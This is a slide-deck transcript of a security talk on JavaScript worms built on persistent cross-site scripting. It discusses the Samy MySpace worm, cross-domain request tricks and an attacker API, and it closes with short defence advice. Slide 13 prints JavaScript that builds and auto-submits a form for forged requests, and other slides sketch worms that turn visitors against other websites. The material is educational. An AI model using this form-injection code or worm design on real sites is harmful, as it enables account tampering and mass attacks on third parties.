Presentation is loading. Please wait.

Presentation is loading. Please wait.

Javascript worms By Benjamin Mossé SecPro

Published byEvelyn Jacobs Modified over 6 years ago

Similar presentations

Presentation on theme: "Javascript worms By Benjamin Mossé SecPro"— Presentation transcript:

1 Javascript worms By Benjamin Mossé SecPro
The next step in the evolution By Benjamin Mossé SecPro

2 Synopsis Introduction to cross site scripting Permanent XSS
Javascript worms up to now A fresh technique: remote request Profit of APIs to build worms Protecting yourself Conclusion

3 Introduction to XSS The most common web vulnerability
Allows client side script injection (html, javascript, vbscript, etc.)‏ The target executes the malicious code There isn't any “magic” solution against it

4 Introduction to XSS (cont.)‏
Javascript is the language used to exploit this vulnerability Before 2005, the XSS wasn't considered critical Wrong idea: “you can only steal cookies with it” 2005: Ajax, possibility to create http requests - too many people though that the xss wasn't powerful because you can only steal a cookie with it; - the community had new requirements, ajax was born; - xss vulnerability is now critical.

5 Introduction to XSS (cont.)‏
3 different types: Non permanent Permanent Dom-based A JavaScript exploit would work the same with every of them

6 Permanent XSS Stays on the website permanently
Known also as Persistent The JavaScript exploit is stored (e.g Database, RSS)‏ Affects every person visiting the infected page

7 Permanent XSS (cont.)‏ Vulnerable site Insert malicious code in a form
Website saves the script into the database Hacker Infected site Users getting exploited Users Database

8 “Samy is my Hero” Infected MySpace and took it down
Most famous Javascript worm Spread through a permanent XSS Made users perform malicious commands using Ajax Users would re-infect their account

9 Samy is my Hero (analyse)‏
MYSPACE.COM Worm site on MySpace Users The infected page makes the users infect other pages on the website: THE WORM IS SPREADING EVERYWHERE

10 Javascript worms assets
Very hard to detect Very stealth: runs in the background & don't modify your web page It's not the pirate who performs the attack but an exploited user Can spread very quickly Up to a certain point it's impossible to trace back the pirate

11 Using Ajax Perform http requests on the infected website
NO REMOTE REQUESTS, only works on the same domain Hacking possibilities: make target do request he didn't intend too (e.g. password modification, delete account, change , change secret question, exploit SQL injection, exploit remote code execution, spread the worm, deface website ...)‏

12 A fresh technique: remote requests
Is it really impossible to make remote http requests with Javascript? -> NO! GET request methodologies: - Append an image in the page (e.g. <img src=” />)‏ - Append a frame in the page (e.g. <iframe src=” />)‏ POST request methodologies: - Append a complete form on the page - submit the form with Javascript (e.g. page.form.submit();)‏

13 Processing POST requests
var objBody = document.getElementsByTagName("body")[0]; var form = document.createElement("form"); var form_action = document.createAttribute("action"); form_action.value = " form.setAttributeNode(form_action); var input_username = document.createElement("input"); var attr_username_name = document.createAttribute("name"); input_username.setAttributeNode(attr_username_name); form.appendChild(input_username); objBody.appendChild(form); document.getElementsByTagName("form")[0].submit();

14 GNUCITIZEN: AttackAPI
Hackers' API to build Javascript worms Uses Google's APIs to search for targets Makes the manipulation of web pages with Javascript easy as Other features: cookie stealing and modifying, do CSRF attacks, ports scanner, hijack forms and more! And much more to come in the next version.

15 Future worms 1 2 3 Users visit web page infected with a worm OTHER
Internet The worm looks for vulnerable targets on Internet using the Google API OTHER WEBSITES 3 worm The worms uses visitors to infect or attack a list of websites he found

16 Risk? Consequences? Obviously very high!
Imagine someone finding a permanent XSS on a website like MySpace and using the users to lunch a attack over others Internet websites? Imagine your company website getting target by millions of MySpace's users? Imagine that when security experts look who hack a website they don't found the pirate IP but yours? What will you do?

17 Protecting your applications
“Satisfaction remains a shape of resignation” Start by educating your programmers to secure programming Ask for regular security checking of your web applications to SecPro

18 Conclusion It's now possible to massively attack Internet with a XSS vulnerability Never underestimate the cross site scripting vulnerability again! Protect your web application against it, not only for your personal security but for the entire Internet community

19 Benjamin Mossé Security Specialist with SecPro (Melbourne, Australia)‏
Researcher & programmer SecPro specializes in penetration testing and consulting of web applications security.

Download ppt "Javascript worms By Benjamin Mossé SecPro"

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications Danielle Cauthen 04/09/2010 COMS E6125 – Web enHanced Information Management.

Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications Danielle Cauthen 04/09/2010 COMS E6125 – Web enHanced Information Management.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners David Shelly Randy Marchany Joseph Tront Virginia Polytechnic Institute.

Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners David Shelly Randy Marchany Joseph Tront Virginia Polytechnic Institute.
© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me.

© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.

IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.

Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.
Web Security Demystified Justin C. Klein Keane Sr. InfoSec Specialist University of Pennsylvania School of Arts and Sciences Information Security and Unix.

Web Security Demystified Justin C. Klein Keane Sr. InfoSec Specialist University of Pennsylvania School of Arts and Sciences Information Security and Unix.

Similar presentations

Ads by Google